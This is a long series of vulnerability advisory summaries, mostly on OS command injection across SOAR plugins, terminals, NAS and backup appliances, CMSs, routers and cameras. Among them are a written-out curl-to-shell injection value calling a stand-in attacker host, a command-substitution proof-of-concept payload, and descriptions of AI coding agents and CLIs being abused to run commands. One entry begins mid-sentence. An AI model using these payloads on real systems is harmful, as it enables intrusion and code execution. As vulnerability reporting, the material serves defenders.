OS command injection in Rapid7's InsightConnect Translate (TR) Plugin on Linux lets remote attackers run arbitrary shell commands by injecting into the 'text' or 'expression' parameters of the TR action, which are concatenated into a shell command without sanitization (CWE-78). All plugin versions before 2.0.3 are affected. There is no public exploit identified at time of analysis and EPSS is low (0.55%), but the flaw yields full system compromise per the vendor's own SSVC 'total' technical-impact rating.
OS command injection in Rapid7's InsightConnect Ping Plugin (versions before 1.0.4) on Linux lets attackers run arbitrary operating-system commands by injecting shell metacharacters into the host parameter of the plugin's ping action, which is concatenated into a shell command without proper sanitization. Any actor able to influence the host input flowing into this SOAR plugin gains full code execution on the plugin's runtime host. There is no public exploit identified at time of analysis, EPSS is low (0.55%), and CISA's SSVC marks exploitation as 'none' and the flaw as not automatable, so risk is real but not yet observed in the wild.
OS command injection in the Rapid7 InsightConnect Sed Plugin on Linux lets an authenticated operator inject arbitrary shell commands through the plugin's `expression` parameter, which is passed to the underlying `sed` invocation without sufficient sanitization. Because InsightConnect is a SOAR orchestration platform, a low-privileged workflow author or connected user (PR:L) can achieve full code execution in the plugin's runtime context (C:H/I:H/A:H, CVSS 8.8). There is no public exploit identified at time of analysis and the issue is not on CISA KEV.
Remote code execution in Quest NetVault Backup allows authenticated remote attackers - who can bypass the product's existing authentication mechanism - to run arbitrary OS commands as SYSTEM via the NVBULogDaemon JSON-RPC interface. The flaw stems from unsanitized user-supplied input being passed into a system call (CWE-78), and the credentialed authentication barrier is undermined by an acknowledged bypass, effectively widening exposure. No public exploit has been identified at time of analysis, but the issue was disclosed by Trend Micro ZDI (ZDI-26-376) and carries a CVSS of 8.8.
OS command injection in Rapid7's InsightConnect SQLmap Plugin (versions before 2.0.1) on Linux lets an authenticated InsightConnect user inject arbitrary operating-system commands through the api_host or api_port fields supplied while configuring the plugin's connection. Because the plugin runs inside the InsightConnect orchestration runtime, a successful injection yields code execution in that automation context (CVSS 8.8, CWE-78). No public exploit identified at time of analysis, and SSVC records exploitation status as none; EPSS is modest at 0.73% (50th percentile).
OS command injection in the Rapid7 InsightConnect RPM Plugin on Linux lets authenticated users run arbitrary operating-system commands by injecting shell metacharacters into the repo, key, or name parameters, which are concatenated into a shell command without sanitization (CWE-78). All versions before 1.0.2 are affected. There is no public exploit identified at time of analysis, and the EPSS probability is low (0.73%, 50th percentile).
Remote authenticated command injection in Unraid's web management server allows attackers to execute arbitrary OS commands as the www-data user by abusing unsanitized input in ToggleState.php. Any user with low-privilege authenticated web access can chain this CWE-78 flaw into full code execution on the underlying NAS host. Discovered and reported through ZDI (ZDI-CAN-30134 / ZDI-26-386); no public exploit identified at time of analysis and no CISA KEV listing.
Authenticated remote code execution in Unraid stems from OS command injection in the web server's FileUpload.php, where a user-supplied string is passed to a system call without validation, letting any logged-in attacker run arbitrary commands as the www-data user. Tracked as ZDI-CAN-30116 and disclosed via the Zero Day Initiative, it carries a CVSS 8.8 rating; no public exploit identified at time of analysis, and it is not listed in CISA KEV.
Stored cross-site scripting leading to OS command execution in SiYuan, an open-source personal knowledge management system, affects all desktop client versions prior to 3.7.0. Untrusted marketplace package metadata (name, version, author, description) is serialized via JSON.stringify() into a single-quoted data-obj HTML attribute without escaping single quotes or angle brackets, so a package name containing a single quote breaks out of the attribute and injects arbitrary HTML; because the Electron BrowserWindow runs with nodeIntegration:true and contextIsolation:false, the DOM XSS escalates to arbitrary command execution on the host. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-x88j-wgpr-h22x) notes this is the same root cause and impact as a prior advisory, reached through a sibling sink the earlier patch missed.
Command injection in Warp's prompt branch-selector chip lets a crafted Git branch name execute in the victim's shell when they click that branch in the UI. It affects Warp builds from 0.2025.08.06.08.12.stable_00 up to the fix in 0.2026.05.06.15.42.stable_01, and is exploitable by anyone able to publish a branch to a repository the victim opens in Warp. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Command injection in the Warp agentic development environment (Linux builds 0.2024.02.20.08.01.stable_01 through pre-0.2026.05.06.15.42.stable_01) lets an attacker run arbitrary shell commands as the local user when a victim opens a maliciously named file through an affected external or system-default editor route. Warp expanded freedesktop .desktop Exec templates and passed the result to a shell, so shell metacharacters embedded in a file path are interpreted rather than treated as data. There is no public exploit identified at time of analysis and the issue is not in CISA KEV; impact is high (CVSS 7.8) but requires local context and user interaction.
Command injection in Warp's legacy SSH background command path lets an attacker-controlled remote host inject shell syntax that runs as the victim's authenticated SSH account. Affecting Warp from 0.2023.03.21.08.02.stable_00 up to (but not including) 0.2026.05.06.15.42.stable_01, the flaw stems from the terminal trusting the remote working directory, repository, or directory name reported by an SSH session when assembling helper commands for metadata collection. No public exploit identified at time of analysis, though the fix commit ships regression tests that demonstrate the breakout; not listed in CISA KEV and no EPSS provided.
Terminal lifecycle hook spoofing in Warp versions prior to 0.2026.05.06.15.42.stable_01 allows an attacker who controls terminal output viewed by a victim to inject unauthenticated shell integration hooks into the PTY stream, causing Warp to accept falsified session metadata - including spoofed current working directory and SSH session transport parameters. Exploitation requires user interaction (the victim must view attacker-controlled terminal content in Warp), and no public exploit code has been identified at time of analysis. The CVSS-assigned availability impact (A:L) and absence of integrity impact (I:N) appear inconsistent with the described spoofing behavior; session state falsification is the primary operational concern for affected users.
OS command injection in Warp (the agentic terminal/development environment) affects builds from 0.2024.03.12.08.02.stable_01 up to the fix in 0.2026.05.06.15.42.stable_01 when running under Windows Subsystem for Linux. When wslview cannot open a URL, Warp falls back to a Windows command processor (cmd.exe /c start), so a malicious URL emitted into terminal output executes attacker-controlled Windows commands once the user clicks the link. No public exploit identified at time of analysis and the issue is not in CISA KEV, but the fix commit clearly documents the injection path.
OS command injection in Warp's AI Agent code-search tooling allows attacker-controlled inputs to escape read-only search operations and execute arbitrary shell commands in the user's terminal. Affected builds from 0.2025.04.09.08.11.stable_00 up to 0.2026.05.06.15.42.stable_01 implement the Grep and FileGlob actions — which the Agent's command-execution policy authorizes only as read/search — by concatenating Agent-supplied search text, paths, and glob patterns into unquoted shell command strings. There is no public exploit identified at time of analysis, though the vendor fix commit and its regression tests publicly demonstrate the injection technique (e.g. a $(touch /tmp/warp-poc) payload).
Pre-sandbox host-level code execution in Google Gemini CLI (versions prior to 0.39.1) and the run-gemini-cli GitHub Action (prior to 0.1.22) allows an unprivileged attacker to run arbitrary commands on CI/CD runner hosts by planting a malicious .gemini/.env file in an untrusted workspace. In headless mode the tool automatically trusted workspace folders and loaded their environment variables before sandboxing, so a workflow that processes attacker-controlled content (for example reviewing a submitted pull request) would execute attacker-supplied commands on the host. No public exploit has been identified at time of analysis, but Google rates this CVSS 4.0 10.0 and a vendor advisory (GHSA-wpqr-6v78-jr5g) with fixed releases is available.
Jenkins Git client Plugin 6.6.0 and earlier does not correctly escape the workspace directory name when it is embedded into a generated SSH wrapper script, allowing attackers able to control the name of a build's working directory to execute arbitrary operating system commands on the agent.
Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute arbitrary shell commands by sending crafted network packets to the DVRSearch service or Network.cgi endpoint. The flaw lives in libNetSetObj.so where DNS configuration values are concatenated into a shell command string and passed to system() without sanitization. No public exploit identified at time of analysis, but the vendor advisory and a Talos vulnerability report are published.
The FileOrganizer WordPress plugin before 1.1.9, Advanced File Manager WordPress plugin before 5.4.12, File Manager Pro WordPress plugin before 2.1.1, File Manager WordPress plugin before 8.0.4 do not properly escape a parameter before passing it to a shell command when processing image operations, allowing authenticated users to perform OS Command Injection. This requires the server to have the ImageMagick convert CLI available without either the PHP imagick or GD extensions.
Authenticated OS command injection in the myVesta hosting control panel lets a low-privileged user inject arbitrary shell commands through the v_ftp_user parameter during FTP-account deletion, escalating to full command execution as the admin user and takeover of the panel. Publicly available exploit code exists (documented by ProjectBlack/PRJBLK) and a vendor fix commit has been published, though no CISA KEV listing or EPSS data is provided. Because a scope change moves the attacker from a low-privilege panel account to admin-level command execution, this is a high-impact privilege-escalation-to-RCE path.
OS command injection in Dell PowerProtect Data Domain across four supported release tracks allows a high-privileged local attacker to execute arbitrary operating system commands. Affected versions span the main release line (7.7.1.0-8.7) as well as LTS2024, LTS2025, and LTS2026 branch releases. No public exploit code or active exploitation has been identified at time of analysis; the local access and high-privilege prerequisites substantially constrain the realistic attack surface despite the full C/I/A impact scores.
Arbitrary OS command execution in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus the LTS2026, LTS2025 and LTS2024 branches) lets a high-privileged, remotely-authenticated attacker run operating-system commands on the backup appliance by injecting special characters into an OS command context. The flaw was reported by Dell and is addressed in advisory DSA-2026-278; no public exploit identified at time of analysis and it is not listed in CISA KEV. Because it grants full command execution on a data-protection appliance, successful exploitation can compromise the confidentiality, integrity and availability of backup data.
OS command injection in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus the LTS2026, LTS2025, and LTS2024 maintenance branches) lets an authenticated high-privileged remote attacker execute arbitrary operating-system commands on the appliance via improperly neutralized special characters (CWE-78). Because the attacker already holds elevated privileges, the flaw functions as a privilege-boundary and integrity break - turning administrative access into full underlying-OS command execution with high confidentiality, integrity, and availability impact. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported by Dell and fixed in advisory DSA-2026-278.
Authenticated OS command injection in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus LTS2026 8.6.1.0-8.6.1.10, LTS2025 8.3.1.0-8.3.1.30, and LTS2024 7.13.1.0-7.13.1.70) lets a high-privileged remote attacker inject arbitrary operating-system commands and execute them on the appliance. Successful exploitation yields full confidentiality, integrity, and availability impact (CVSS 7.2), effectively giving an authenticated administrator command execution on the underlying OS of a backup/data-protection system. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV.
OS command injection in Dell PowerProtect Data Domain enables a high-privileged local attacker to execute arbitrary operating system commands on the backup appliance, achieving full command execution within the Data Domain OS (DDOS). The flaw spans the general release track (7.7.1.0-8.6) and three LTS streams (LTS2024, LTS2025, LTS2026), indicating a shared vulnerable code path across a wide version surface. No public exploit code or CISA KEV listing exists at time of analysis, and the PR:H/AV:L prerequisites meaningfully constrain real-world risk to insider threats or post-compromise scenarios.
OS command injection in Dell PowerProtect Data Domain across four version release trains allows a high-privileged remote attacker to execute arbitrary operating system commands on the appliance. Affected products span mainline versions 7.7.1.0 through 8.7 and three LTS branches, confirmed by Dell Security Advisory DSA-2026-278. No public exploit identified at time of analysis and the CVE is absent from CISA KEV; however, the high integrity and availability impact (I:H/A:H) on a backup appliance makes patching urgent for environments where backup infrastructure is shared or admin credentials are broadly distributed.
Arbitrary command execution in electerm (the open-source cross-platform SSH/SFTP/terminal client) allows a malicious remote server to run OS commands on the connecting user's desktop. The flaw lives in the rmrf(), mv() and cp() helpers in src/app/lib/fs.js, which build shell command strings by interpolating attacker-influenced file paths without escaping shell metacharacters; a hostile SSH/SFTP server that serves files with crafted names can break out of the quoted argument when the victim performs a file operation. Rated CVSS 8.8; no public exploit identified at time of analysis and it is not listed in CISA KEV, so treat this as high-severity but not confirmed exploited.
Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.
Unauthenticated OS command injection in Notifiarr Dockwatch through version 0.6.567 lets remote attackers run arbitrary shell commands on the host and achieve full compromise, since default deployments mount the Docker socket. The root cause is an Execution-After-Redirect flaw (CWE-698) where loader.php redirects unauthenticated users but fails to call exit(), allowing the attacker to seed the required session flag and then reach shell_exec() in ajax/compose.php with attacker-controlled input. The CVSS 4.0 base score is 9.2 (VC/VI/VA all High); there is no public exploit identified at time of analysis and it is not listed in CISA KEV, though a vendor advisory and upstream fix exist.
OS command injection in the mercurial (hg) handler of openSUSE's obs-service-tar_scm source service before 0.12.4 lets an attacker who can supply a _service file inject options and shell metacharacters through the 'revision' field, achieving arbitrary code execution as the source service or as a local user checking out the service. The CVSS 3.1 base score is 10.0 (scope-changed, network vector), reflecting that malicious input is processed by the build service. No public exploit has been identified at time of analysis, though the upstream fix (openSUSE/obs-service-tar_scm PR #552) publicly discloses the vulnerable code path.
Command injection in Ubiquiti UniFi OS (all builds before 5.1.19) lets a low-privileged user on the same network run arbitrary operating-system commands on the underlying host device, giving full control of gateways, recorders, and Cloud Keys. The flaw stems from improper input validation (CWE-20) and carries high confidentiality, integrity, and availability impact (CVSS 8.8). There is no public exploit identified at time of analysis, and CISA's SSVC framework rates exploitation as none, but the technical impact is total and a vendor patch is already available.
Improper access control in Ubiquiti's UniFi Connect Application allows a network-adjacent attacker to bypass authentication and inject arbitrary operating-system commands on the underlying host, yielding full compromise (CVSS 10.0). The flaw chains an access-control weakness (CWE-284) with command injection, so an unauthenticated attacker reachable on the network can execute code with the application's privileges and pivot beyond the app boundary (scope change). No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV; EPSS data was not provided.
Command injection in Ubiquiti's UniFi Access Application lets a low-privileged attacker with network reach run arbitrary OS commands on the underlying host device, escaping the application into the operating system (CVSS 9.9, scope-changed). Improper input validation (CWE-20) means attacker-supplied data reaches a shell context; there is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV. Reported through HackerOne and addressed in Ubiquiti Security Advisory Bulletin 066.
Root-level command injection in OpenWrt's luci-app-travelmate/travelmate (confirmed in 2.4.5-r3, sink still present in 2.4.6-1) lets an rpcd/LuCI session holding only the luci-app-travelmate write ACL escalate to arbitrary command execution as root. The LuCI UI limits the auto-login script picker to /etc/travelmate/*.login, but that is a frontend-only check: the root-run backend reads the raw UCI 'script' and 'script_args' values, so an attacker sets script to /bin/sh with controlled arguments to run commands as root when the captive-portal auto-login branch fires. Reported by VulnCheck with no public exploit identified at time of analysis and no CISA KEV listing.
Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.
Remote OS command injection in Network UPS Tools upsmon (versions 2.8.3-2.8.5) allows a network-positioned attacker - acting as a man-in-the-middle on the plaintext 3493/tcp NUT protocol connection, operating a compromised upsd server, or controlling a rogue UPS device - to execute arbitrary shell commands as the upsmon service account. The vulnerability exists in the NOTIFYCMD alarm handler, where server-supplied ups.alarm text is interpolated directly into a shell command string and executed via system(), enabling injection of shell metacharacters. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the oss-security disclosure contains sufficient implementation detail to construct a working exploit.
Unauthenticated OS command injection in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) lets network-adjacent attackers run arbitrary shell commands as root through the smacfilter_conf handler in the commuos web backend. Publicly available exploit code exists (published by VulnCheck/IEATASICS), and successful exploitation grants full device takeover; the flaw carries a CVSS 4.0 base score of 9.3 but is reachable only by attackers adjacent to the device's network. No public exploit is listed in CISA KEV, so this is proof-of-concept exposure rather than confirmed active exploitation.
OS command injection in AWS aws-cdk-lib lets an actor who controls a dependency version string in a project's package.json run arbitrary commands on the host executing the CDK toolchain. The flaw lives in the OsCommand helper of the NodejsFunction Docker bundling pipeline, which passes unsanitized version strings into a shell during nodeModules installation. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; AWS has released a fixed version (v2.260.0).
Unauthenticated OS command injection in the Guardian language-system PHP application lets remote attackers run arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter of text_to_subtitles.php, which is concatenated directly into a PHP exec() call. Any internet-reachable instance can be fully compromised without credentials or user interaction, and the CVSS 4.0 base score of 9.3 reflects full confidentiality, integrity, and availability loss. No public exploit identified at time of analysis, though a VulnCheck advisory and a technical gist describe the exact vulnerable code path.
OS command injection in Guardian language-system's transcribe.php lets an unauthenticated remote attacker inject arbitrary shell commands through the 'id' GET parameter, which is concatenated directly into a PHP exec() call. Because no authentication or user interaction is required and the flaw yields full command execution, it maps to a CVSS 4.0 score of 9.3 with high confidentiality, integrity, and availability impact. No public exploit is identified at time of analysis, though a public gist writeup and a VulnCheck advisory document the issue.
OS command injection in Guardian language-system's transcribe_amazon.php allows an unauthenticated remote attacker to run arbitrary operating-system commands on the host. The id GET parameter is concatenated directly into a PHP exec() call that shells out to a transcription job, so appending shell metacharacters (e.g. ; | `) yields command execution with the privileges of the web server. No authentication or user interaction is required (PR:N/UI:N), and a public gist reference exists that may contain proof-of-concept details, though active exploitation is not confirmed in CISA KEV.
OS command injection in Guardian Language System's translate_text.php allows unauthenticated remote attackers to execute arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter, which is concatenated directly into a PHP exec() call. Because no authentication is required and the CVSS 4.0 vector is AV:N/AC:L/PR:N/UI:N, exploitation is trivial and yields full command execution in the web server's context. There is no public exploit identified at time of analysis, though a VulnCheck advisory and a public gist document the flaw.
Unauthenticated OS command injection in Guardian language-system's speech_text.php allows remote attackers to execute arbitrary shell commands by injecting metacharacters into the id GET parameter, which is passed unsanitized into a PHP exec() call. No authentication is required (CVSS 4.0 base 9.3), giving full read/write/availability impact on the host. A referenced GitHub gist and a VulnCheck advisory document the flaw, indicating publicly available exploit details, though it is not listed in CISA KEV.
OS command injection in the Guardian language-system's speechmac.php enables unauthenticated remote attackers to run arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter, which is concatenated directly into a PHP exec() call. No credentials or user interaction are required, so any network-reachable instance can be fully compromised. This is a CWE-78 flaw carrying a CVSS 4.0 base score of 9.3; no public exploit identified at time of analysis, though a referenced gist may contain proof-of-concept material.
OS command injection in the Guardian language-system lets unauthenticated remote attackers run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speechmac_text.php concatenates directly into a PHP exec() call. The CVSS 4.0 base score is 9.3 (critical) with full compromise of confidentiality, integrity, and availability, and no authentication or user interaction is needed. No public exploit identified at time of analysis, though a referenced gist and the VulnCheck advisory may contain technical exploitation detail.
OS command injection in Guardian language-system allows an unauthenticated remote attacker to execute arbitrary shell commands by injecting metacharacters into the 'id' GET parameter of complex_start.php, which is passed unsanitized into a PHP exec() call. No authentication or user interaction is required, and the CVSS 4.0 score of 9.3 (Critical) reflects full compromise of confidentiality, integrity, and availability. A public gist demonstrating the flaw means publicly available exploit code exists, though it is not listed in CISA KEV.
OS command injection in the Guardian language-system lets an unauthenticated remote attacker run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speech.php passes unsanitized into a PHP exec() call. Rated CVSS 4.0 9.3 (Critical) with a fully remote, no-privilege, no-interaction vector, this is a direct pre-auth RCE. No CISA KEV listing or EPSS score is present in the provided data, and no confirmed public exploit is identified, though a referenced GitHub gist and a VulnCheck advisory document the flaw.
OS command injection in the Guardian language-system lets an unauthenticated remote attacker execute arbitrary operating-system commands on the hosting server. The flaw arises because text.php passes the user-controlled 'id' GET parameter straight into a PHP exec() call without sanitization, allowing shell metacharacters to break out of the intended command. The CVSS 4.0 base score is 9.3 (network vector, no privileges, no user interaction); no public exploit is identified at time of analysis, though a referenced gist and a VulnCheck advisory document the issue.
OS command injection in Guardian language-system lets unauthenticated remote attackers run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter of translate.php, which is concatenated directly into a PHP exec() call. Publicly available exploit code exists (published as a gist via VulnCheck), and the CVSS 4.0 base score of 9.3 reflects full compromise of confidentiality, integrity, and availability with no authentication or user interaction. There is no public exploit identified as actively exploited in CISA KEV, so the current risk is driven by ease of exploitation and public PoC rather than confirmed in-the-wild abuse.
Remote code execution in Guardian language-system allows unauthenticated attackers to run arbitrary OS commands by injecting shell metacharacters into the 'id' GET parameter of subtitles.php, which is concatenated directly into a PHP exec() call invoking jobs/subtitle_rendering.php. The CVSS 4.0 base score of 9.3 reflects network-reachable, no-privilege, no-interaction exploitation, and publicly available exploit code exists (published via VulnCheck), though there is no public exploit identified as being actively used in the wild at time of analysis.
Default-credential authentication bypass in JAIOTlink C492A-W6 Wi-Fi IP cameras (firmware 4.8.30.57701411) lets attackers log in to the anyka_ipc HTTP service on port 80 using the built-in admin username with an empty password, granting full access to snapshots, live video, network configuration, and factory-level API endpoints. Because the same interface exposes a SetMAC command-injection surface, this trivial access can be pivoted toward device-level code execution. Publicly available exploit code exists (published by VulnCheck), though this CVE is not listed in CISA KEV and no active exploitation is confirmed.
Authenticated remote code execution in JAIOTlink C492A-W6 Wi-Fi IP cameras (firmware 4.8.30.57701411) lets a logged-in attacker run arbitrary OS commands via the HTTP PUT NetSDK/Factory SetMAC endpoint. The Wireless parameter is only partially validated by sscanf(), so a value shaped as a valid MAC prefix followed by a semicolon and shell payload survives validation and is passed unsanitized into an echo command run through system(). Publicly available exploit code exists (VulnCheck), and CVSS 4.0 rates it 8.7 (High); no public exploit identified in CISA KEV, so this is not confirmed actively exploited.
Authenticated OS command injection in Seiko Solutions SkyBridge MB-A100 and MB-A110 industrial LTE gateways allows an attacker who is already logged in with administrative privileges to execute arbitrary operating-system commands on the device. The CVSS 4.0 base score is 8.6 (High), reflecting full confidentiality, integrity, and availability impact once admin access is obtained, though the PR:H requirement confines exposure to authenticated administrators. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.
Unauthenticated OS command injection in Tenda AC18 v15.03.05.05 exposes the device to full remote compromise via a crafted HTTP request to the /goform/fast_setting_internet_set endpoint. The vulnerability is a second-order (stored) injection through the mac parameter - malicious payloads are written into device configuration and executed when triggered. No public exploit identified at time of analysis, though SSVC confirms a proof-of-concept exists and the attack is automatable, making mass exploitation technically feasible against internet-exposed devices.
Unauthenticated remote command injection in StoneFly Storage Concentrator (SC) and its virtual appliance variant (SCVM) lets remote attackers run arbitrary OS commands as root by sending a crafted HTTP request to the debug.pl script, which processes attacker input without sanitization. Rated CVSS 4.0 10.0 and reported through CISA ICS-CERT (advisory ICSA-26-181-06); no public exploit identified at time of analysis. This is a complete-compromise primitive requiring no credentials or user interaction.
Unauthenticated remote code execution in StoneFly Storage Concentrator (SC) and its virtual appliance variant (SCVM) lets attackers run arbitrary commands as root by sending a crafted packet to the ms_service.pl listener on TCP port 9000. The flaw was reported through CISA ICS-CERT (advisory ICSA-26-181-06) and carries the maximum CVSS 4.0 base score of 10.0; no public exploit has been identified at time of analysis, but the combination of network reachability, zero authentication, and root-level impact makes this a top-priority issue for any exposed device.
Arbitrary code execution in Grav CMS before 2.0.0-beta.2 stems from three distinct flaw classes: PHP object injection via unsafe unserialize() of attacker-controllable data in the Scheduler JobQueue, FileCache adapter, and Session components, an OS command injection in the plugin/theme InstallCommand git clone routine, and a Twig sandbox blocklist bypass enabling server-side template injection. An attacker who can influence the serialized input can chain available gadgets to run arbitrary PHP, while the command-injection path is reachable by authenticated administrators through plugin/theme installation. No public exploit identified at time of analysis; the issues were privately reported by VulnCheck and are fixed in 2.0.0-beta.2.
Authenticated command injection in Coolify's CA Certificate management feature (all versions prior to 4.0.0-beta.464) lets any logged-in user inject arbitrary OS commands that execute as the configured SSH user on a managed server. Because Coolify requires that SSH user to be root or a docker-group member, successful exploitation yields full compromise of the managed host and every Docker container it runs. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, but the low attack complexity and minimal privilege requirement make it a high-priority patch for any multi-user Coolify instance.
{$command}'` invocation without sanitizing single quotes, and the user-controlled `docker_compose_custom_build_command` and `docker_compose_custom_start_command` fields are interpolated directly into that shell string. No public exploit has been identified at time of analysis, but the CVSS scope-change flag (S:C) confirms the critical container-to-host escape dimension, and the injection technique is well-understood - making the practical impact substantially higher than the reported 6.6 base score implies.
Arbitrary OS command execution in RPG Maker MV and MZ (Gotcha Gotcha Games) is triggered when a victim loads a maliciously crafted save-file, allowing an attacker to run commands with the privileges of the game process. The flaw is a classic OS command injection (CWE-78) reported through JPCERT/JVN; no public exploit has been identified at time of analysis and it is not in CISA KEV. Because exploitation is local and requires the user to load attacker-supplied data, impact hinges on social-engineering victims into opening untrusted saves.
Privileged OS command injection in the AVTECH Security Corporation DGM3103SCT surveillance device lets an authenticated user of the web management console inject operating-system commands that run with root privilege (CWE-78). Disclosed via JPCERT/CC coordination (JVN28979424), it carries CVSS 4.0 base 8.6 with no public exploit identified at time of analysis. Because the CVSS vector requires high privileges (PR:H), exploitation presumes a logged-in administrative web user, but successful abuse yields full root-level device takeover.
Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permissions execute arbitrary commands as root on managed servers. The 'network' parameter in the Destination Network Management feature is passed unsanitized into shell commands, yielding full root-level remote code execution on the host. No public exploit identified at time of analysis; the issue is fixed in 4.0.0-beta.471.
Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authenticated user run arbitrary commands on the deployment host. The flaw is an OS command injection in the Nixpacks build pack: the user-supplied install_command build parameter is concatenated unsanitized into a shell command executed during the build phase, allowing escape from the build context to host-level command execution. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV, but the path to abuse is straightforward for any user who can configure a deployment.
Root command injection in OpenWrt's LuCI web interface (luci-proto-openvpn through 0.11.1) lets an authenticated user with OpenVPN protocol configuration access run arbitrary commands as root. The flaw lives in the generateKey ubus method, where the cl_meta parameter is passed unescaped into a popen() shell call. No public exploit has been identified at time of analysis, but a vendor advisory (GHSA-pm9w-522m-8rrh) and fix commit exist, and the CVSS 4.0 score of 8.7 reflects full confidentiality, integrity, and availability impact on the affected device.
Authenticated root command injection in the OpenWrt LuCI community Tailscale app (luci-app-tailscale-community) lets a logged-in web UI user run arbitrary OS commands as root through the tailscale.do_login RPC method. Because the user-supplied loginserver and loginserver_authkey values are placed inside a double-quoted shell string, $() and backtick substitutions are evaluated by the outer shell, turning configuration input into command execution. Reported by VulnCheck with a published GHSA advisory; no public exploit identified at time of analysis and the issue is not in CISA KEV.
OS command injection in the Edimax EW-7478APC wireless access point firmware 1.04 allows a network-reachable authenticated attacker to execute arbitrary OS commands on the device by manipulating the `rootAPmac` parameter in POST requests to `/goform/formStaDrvSetup`. A public proof-of-concept exploit is available, indexed by VulDB and documented externally, and the vendor did not respond to responsible disclosure - making a vendor-released patch unlikely in the near term. The provided CVSS 4.0 score of 2.1 appears to significantly understate actual impact, as OS command injection on embedded Linux network devices typically yields full device compromise rather than the 'Low' impact across all three dimensions assigned in the vector.
OS command injection in the Edimax EW-7478APC wireless access point (firmware 1.04) allows remote attackers with low-privilege credentials to execute arbitrary operating system commands by manipulating the rootAPmac parameter in a POST request to /goform/formiNICbasic. A public proof-of-concept exploit is available, materially lowering the barrier to exploitation. The vendor did not respond to coordinated disclosure, leaving no official patch path for affected devices.
OS command injection in Edimax EW-7478APC 1.04 allows a remote low-privileged attacker to execute arbitrary operating system commands by manipulating the submit-url parameter in POST requests to the /goform/formAccept endpoint. The vendor was notified prior to public disclosure but did not respond, leaving the vulnerability unpatched. A public proof-of-concept exploit has been disclosed, and the CVSS 4.0 impact metrics (VC:L/VI:L/VA:L) appear to significantly understate the realistic impact of OS command injection on an embedded network device, which typically yields full system control.
OS command injection in the D-Link DCS-935L Wi-Fi network camera (firmware 1.10.01) lets a remote attacker inject arbitrary operating-system commands through the UID POST parameter handled by the sub_400E40 function in setconf.cgi. The CVSS 4.0 vector requires low privileges (PR:L), so an attacker needs some level of authenticated/session access, after which they gain full confidentiality, integrity, and availability impact on the device. Publicly available exploit code exists (disclosed via VulDB), though there is no public exploit identified as actively exploited in the wild.
Command injection in Wavlink WL-NU516U1-A router firmware (M16U1_V240425) allows authenticated remote attackers to execute arbitrary OS commands by submitting crafted POST parameters to the wireless CGI configuration handler. The affected function sub_401D68 within /cgi-bin/wireless.cgi fails to sanitize the SSID2G2, SSID5G2, AuthMethod2, and WPAPSK12 parameters before passing them to OS-level commands. A public proof-of-concept exploit is confirmed available on GitHub; this CVE is not currently listed in CISA's KEV catalog, but the vendor has already released a patched firmware.
Command injection in ANTLR4's Go code generation target (GoTarget.java) allows a local low-privilege attacker to execute arbitrary OS commands via unsanitized input passed to the gofmt invocation, affecting all versions up to 4.13.2. This vulnerability is scoped entirely to local environments such as developer workstations or CI/CD pipelines running ANTLR4 Go target code generation. A publicly available proof-of-concept exploit exists per the GitHub disclosure, but this is not confirmed as actively exploited (not in CISA KEV), and the CVSS 4.0 base score of 1.9 reflects its genuinely constrained real-world impact.
Authenticated command injection in H.View HV-500S6 IP cameras allows a logged-in user to inject unsanitized XML field values into the device's certificate generation interface, which are passed into a backend certificate-creation shell command and executed with elevated privileges. Because exploitation requires valid credentials (CVSS 4.0 PR:H) but is reachable over the network with low complexity, an attacker who obtains any account on the device can run arbitrary OS commands and take full control of the camera. No public exploit has been identified at time of analysis and the CVE is not listed in CISA KEV.
Unauthenticated remote code execution affects Kestra OSS (the open-source event-driven orchestration platform) prior to versions 1.0.45 and 1.3.21, where a flawed authentication whitelist lets attackers reach protected API endpoints without credentials. The AuthenticationFilter exempts the public config endpoint using a suffix match (request.getPath().endsWith("/configs")) instead of an exact path match, so any API path ending in 'configs' bypasses Basic Auth, allowing an attacker to create and run arbitrary workflows. Because the default-enabled script-execution plugins (shell, Python) run inside the worker container as root, this escalates directly to unauthenticated RCE. Carries a maximal CVSS of 10.0; there is no public exploit identified at time of analysis.
